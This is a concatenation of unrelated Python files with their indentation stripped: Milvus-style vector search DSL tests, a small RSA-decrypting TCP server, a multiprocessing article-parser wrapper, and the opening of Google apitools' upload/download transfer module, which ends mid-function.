entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
@pytest.mark.level(2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
limit = default_nb // 2
for i in range(nq):
for result in res[i]:
logging.getLogger().info(result.id)
assert result.id in ids[:limit]
# TODO:
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, with parts of term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(
values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
# TODO:
@pytest.mark.level(2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, with the same values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[1 for i in range(1, default_nb)])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: return null
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_complex_dsl(self, connect, collection):
'''
method: query with complicated dsl
expected: no error raised
'''
expr = {"must": [
{"must": [{"should": [gen_default_term_expr(values=[1]), gen_default_range_expr()]}]},
{"must": [gen_default_vector_expr(default_query)]}
]}
logging.getLogger().info(expr)
query = update_query_expr(default_query, expr=expr)
logging.getLogger().info(query)
connect.load_collection(collection)
res = connect.search(collection, query)
logging.getLogger().info(res)
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(default_nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.level(2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == default_nb
connect.flush([collection_term])
# count = connect.count_entities(collection_term)
# assert count == default_nb
stats = connect.get_collection_stats(collection_term)
assert stats["row_count"] == default_nb
term_param = {"term": {"term": {"values": [i for i in range(default_nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection_term)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
connect.drop_collection(collection_term)
@pytest.mark.level(2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields term, one of it not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": default_nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": default_nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
@pytest.mark.level(2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multi term with same field, and values has common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(default_nb // 2, default_nb + default_nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float",
values=[float(i) for i in range(default_nb // 2, default_nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build query with multi term, different field each term
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(default_nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(default_nb // 2, default_nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges has common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": default_nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": default_nb // 2}}
range_second = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, default_top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_partition(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.level(2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.level(2)
def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
# tag = " "
tag = get_invalid_partition
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_tags=tag)
@pytest.mark.level(2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_not_existed_field(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search function, with the wrong top_k
method: search with top_k
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
# 1463
@pytest.mark.level(2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
# pytest.skip("skip in FLAT index")
pass
if index_type != search_params["index_type"]:
# pytest.skip("skip if index_type not matched")
pass
entities, ids = init_data(connect, collection, nb=1200)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_with_invalid_params_binary(self, connect, binary_collection):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
nq = 1
index_type = "BIN_IVF_FLAT"
int_vectors, entities, ids = init_binary_data(connect, binary_collection)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
connect.create_index(binary_collection, binary_field_name,
{"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
search_params={"nprobe": 0}, metric_type="JACCARD")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
# #1464
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search function, with empty search params
method: search with params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
# pytest.skip("skip in FLAT index")
pass
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_vectors(self, connect, collection):
"""
target: test search function, with empty search vectors
method: search
expected: raise an exception
"""
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchWithExpression(object):
@pytest.fixture(
scope="function",
params=[1, 10, 20],
)
def limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_normal_expressions(),
)
def expression(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[
{"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
]
)
def index_param(self, request):
return request.param
@pytest.fixture(
scope="function",
)
def search_params(self):
return {"metric_type": "L2", "params": {"nprobe": 10}}
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.create_index(collection, default_float_vec_field_name, index_param)
connect.load_collection(collection)
nq = 10
query_data = entities[2]["values"][:nq]
res = connect.search_with_expression(collection, query_data, default_float_vec_field_name, search_params,
limit, expression)
assert len(res) == nq
for topk_results in res:
assert len(topk_results) <= limit
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
|
server_thread_tcp_mateus.py
|
#Servidor TCP
import socket
import rsa
from threading import Thread
global public_key
global private_key
def captura_chave_privada():
arq = open('/home/mateus/projetos/Fatec/5sem/fateclando/mateus/.chavePriMateus.txt','rb')
##carrego a chave
private_key = bytes()
for linha in arq:
private_key += linha
arq.close()
return private_key
def decifrar_message(msgc):
private_key = captura_chave_privada()
return rsa.decrypt(
msgc,rsa.PrivateKey.load_pkcs1(private_key, format='PEM')
)
def conexao(con,cli):
while True:
msg = con.recv(1024)
if b'-----BEGIN RSA PUBLIC KEY-----' in msg:
public_key = msg
else:
print(decifrar_message(msg))
if not msg:
break
print ('Finalizando conexao do cliente', cli)
con.close()
# Endereco IP do Servidor
def inicia_server():
HOST = ''
PORT = 5004
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
orig = (HOST, PORT)
captura_chave_privada()
tcp.bind(orig)
tcp.listen(1)
while True:
con, cliente = tcp.accept()
print ('Concetado por ', cliente)
t = Thread(target=conexao, args=(con,cliente,))
t.start()
|
multiprocessing_realisation.py
|
import pikabu_parser_basic as base
from multiprocessing import Process, Queue
import argparse
import time
blocks = 8
def updated_parser(q, l:int, r:int):
data, error_list = base.get_article_range(l, r)
q.put((data, error_list))
def parallel_parser(l:int, r:int):
step = int((r-l)/blocks) + 1
ths = list()
q = Queue()
for i, val in enumerate(range(l, r, step)):
th = Process(target=updated_parser, args=(q, val, min(val+step, r)))
th.start()
ths.append(th)
res_data = None
error_list = list()
for _ in enumerate(ths):
data, error = q.get()
if res_data is None:
res_data = data
else:
res_data = res_data.append(data)
if error:
error_list += error
for th in ths:
th.join()
return res_data, error_list
if __name__ == '__main__':
base.may_be_main(parallel_parser)
|
transfer.py
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Upload and download support for apitools."""
from __future__ import print_function
import email.generator as email_generator
import email.mime.multipart as mime_multipart
import email.mime.nonmultipart as mime_nonmultipart
import io
import json
import mimetypes
import os
import threading
import six
from six.moves import http_client
from googlecloudsdk.third_party.apitools.base.py import buffered_stream
from googlecloudsdk.third_party.apitools.base.py import exceptions
from googlecloudsdk.third_party.apitools.base.py import http_wrapper
from googlecloudsdk.third_party.apitools.base.py import stream_slice
from googlecloudsdk.third_party.apitools.base.py import util
__all__ = [
'Download',
'Upload',
'RESUMABLE_UPLOAD',
'SIMPLE_UPLOAD',
'DownloadProgressPrinter',
'DownloadCompletePrinter',
'UploadProgressPrinter',
'UploadCompletePrinter',
]
_RESUMABLE_UPLOAD_THRESHOLD = 5 << 20
SIMPLE_UPLOAD = 'simple'
RESUMABLE_UPLOAD = 'resumable'
def DownloadProgressPrinter(response, unused_download):
"""Print download progress based on response."""
if 'content-range' in response.info:
print('Received %s' % response.info['content-range'])
else:
print('Received %d bytes' % response.length)
def DownloadCompletePrinter(unused_response, unused_download):
"""Print information about a completed download."""
print('Download complete')
def UploadProgressPrinter(response, unused_upload):
"""Print upload progress based on response."""
print('Sent %s' % response.info['range'])
def UploadCompletePrinter(unused_response, unused_upload):
"""Print information about a completed upload."""
print('Upload complete')
class _Transfer(object):
"""Generic bits common to Uploads and Downloads."""
def __init__(self, stream, close_stream=False, chunksize=None,
auto_transfer=True, http=None, num_retries=5):
self.__bytes_http = None
self.__close_stream = close_stream
self.__http = http
self.__stream = stream
self.__url = None
self.__num_retries = 5
# Let the @property do validation
self.num_retries = num_retries
self.retry_func = (
http_wrapper.HandleExceptionsAndRebuildHttpConnections)
self.auto_transfer = auto_transfer
self.chunksize = chunksize or 1048576
def __repr__(self):
return str(self)
@property
def close_stream(self):
return self.__close_stream
@property
def http(self):
return self.__http
@property
def bytes_http(self):
return self.__bytes_http or self.http
@bytes_http.setter
def bytes_http(self, value):
self.__bytes_http = value
@property
def num_retries(self):
return self.__num_retries
@num_retries.setter
def num_retries(self, value):
util.Typecheck(value, six.integer_types)
if value < 0:
raise exceptions.InvalidDataError(
'Cannot have negative value for num_retries')
self.__num_retries = value
@property
def stream(self):
return self.__stream
@property
def url(self):
return self.__url
def _Initialize(self, http, url):
"""Initialize this download by setting self.http and self.url.
We want the user to be able to override self.http by having set
the value in the constructor; in that case, we ignore the provided
http.
Args:
http: An httplib2.Http instance or None.
url: The url for this transfer.
Returns:
None. Initializes self.
"""
self.EnsureUninitialized()
if self.http is None:
self.__http = http or http_wrapper.GetHttp()
self.__url = url
@property
def initialized(self):
return self.url is not None and self.http is not None
@property
def _type_name(self):
return type(self).__name__
def EnsureInitialized(self):
if not self.initialized:
raise exceptions.TransferInvalidError(
'Cannot use uninitialized %s', self._type_name)
def EnsureUninitialized(self):
if self.initialized:
raise exceptions.TransferInvalidError(
'Cannot re-initialize %s', self._type_name)
def __del__(self):
if self.__close_stream:
self.__stream.close()
def _ExecuteCallback(self, callback, response):
# TODO(craigcitro): Push these into a queue.
if callback is not None:
threading.Thread(target=callback, args=(response, self)).start()
class Download(_Transfer):
"""Data for a single download.
Public attributes:
chunksize: default chunksize to use for transfers.
"""
_ACCEPTABLE_STATUSES = set((
http_client.OK,
http_client.NO_CONTENT,
http_client.PARTIAL_CONTENT,
http_client.REQUESTED_RANGE_NOT_SATISFIABLE,
))
_REQUIRED_SERIALIZATION_KEYS = set((
'auto_transfer', 'progress', 'total_size', 'url'))
def __init__(self, stream, progress_callback=None, finish_callback=None,
**kwds):
total_size = kwds.pop('total_size', None)
super(Download, self).__init__(stream, **kwds)
self.__initial_response = None
self.__progress = 0
self.__total_size = total_size
self.__encoding = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
@property
def progress(self):
return self.__progress
@property
def encoding(self):
return self.__encoding
@classmethod
def FromFile(cls, filename, overwrite=False, auto_transfer=True, **kwds):
"""Create a new download object from a filename."""
path = os.path.expanduser(filename)
if os.path.exists(path) and not overwrite:
raise exceptions.InvalidUserInputError(
'File %s exists and overwrite not specified' % path)
return cls(open(path, 'wb'), close_stream=True,
auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, auto_transfer=True, total_size=None, **kwds):
"""Create a new Download object from a stream."""
return cls(stream, auto_transfer=auto_transfer, total_size=total_size,
**kwds)
@classmethod
def FromData(cls, stream, json_data, http=None, auto_transfer=None,
**kwds):
"""Create a new Download object from a stream and serialized data."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
download = cls.FromStream(stream, **kwds)
if auto_transfer is not None:
download.auto_transfer = auto_transfer
else:
download.auto_transfer = info['auto_transfer']
setattr(download, '_Download__progress', info['progress'])
setattr(download, '_Download__total_size', info['total_size'])
download._Initialize( # pylint: disable=protected-access
http, info['url'])
return download
@property
def serialization_data(self):
self.EnsureInitialized()
return {
'auto_transfer': self.auto_transfer,
'progress': self.progress,
'total_size': self.total_size,
'url': self.url,
}
@property
def total_size(self):
return self.__total_size
def __str__(self):
if not self.initialized:
return 'Download (uninitialized)'
else:
return 'Download with %d/%s bytes transferred from url %s' % (
self.progress, self.total_size, self.url)
def ConfigureRequest(self, http_request, url_builder):
url_builder.query_params['alt'] = 'media'
# TODO(craigcitro): We need to send range requests because by
# default httplib2 stores entire reponses in memory. Override
# httplib2's download method (as gsutil does) so that this is not
# necessary.
http_request.headers['Range'] = 'bytes=0-%d' % (self.chunksize - 1,)
def __SetTotal(self, info):
if 'content-range' in info:
_, _, total = info['content-range'].rpartition('/')
if total != '*':
self.__total_size = int(total)
# Note "total_size is None" means we don't know it; if no size
# info was returned on our initial range request, that means we
# have a 0-byte file. (That last statement has been verified
# empirically, but is not clearly documented anywhere.)
if self.total_size is None:
self.__total_size = 0
def InitializeDownload(self, http_request, http=None, client=None):
"""Initialize this download by making a request.
Args:
http_request: The HttpRequest to use to initialize this download.
http: The httplib2.Http instance for this request.
client: If provided, let this client process the final URL before
sending any additional requests. If client is provided and
http is not, client.http will be used instead.
"""
self.EnsureUninitialized()
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
url = http_request.url
if self.auto_transfer:
end_byte = self.__ComputeEndByte(0)
self.__SetRangeHeader(http_request, 0, end_byte)
response = http_wrapper.MakeRequest(
self.bytes_http or http, http_request)
if response.status_code not in self._ACCEPTABLE_STATUSES:
raise exceptions.HttpError.FromResponse(response)
self.__initial_response = response
self.__SetTotal(response.info)
url = response.info.get('content-location', response.request_url)
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
self.StreamInChunks()
def __NormalizeStartEnd(self, start, end=None):
if end is not None:
if start < 0:
raise exceptions.TransferInvalidError(
'Cannot have end index with negative start index')
elif start >= self.total_size:
raise exceptions.TransferInvalidError(
'Cannot have start index greater than total size')
end = min(end, self.total_size - 1)
if end < start:
raise exceptions.TransferInvalidError(
'Range requested with end[%s] < start[%s]' % (end, start))
return start, end
else:
if start < 0:
start = max(0, start + self.total_size)
return start, self.total_size - 1
def __SetRangeHeader(self, request, start, end=None):
if start < 0:
request.headers['range'] = 'bytes=%d' % start
elif end is None:
request.headers['range'] = 'bytes=%d-' % start
else:
request.headers['range'] = 'bytes=%d-%d' % (start, end)
def __ComputeEndByte(self, start, end=None, use_chunks=True):
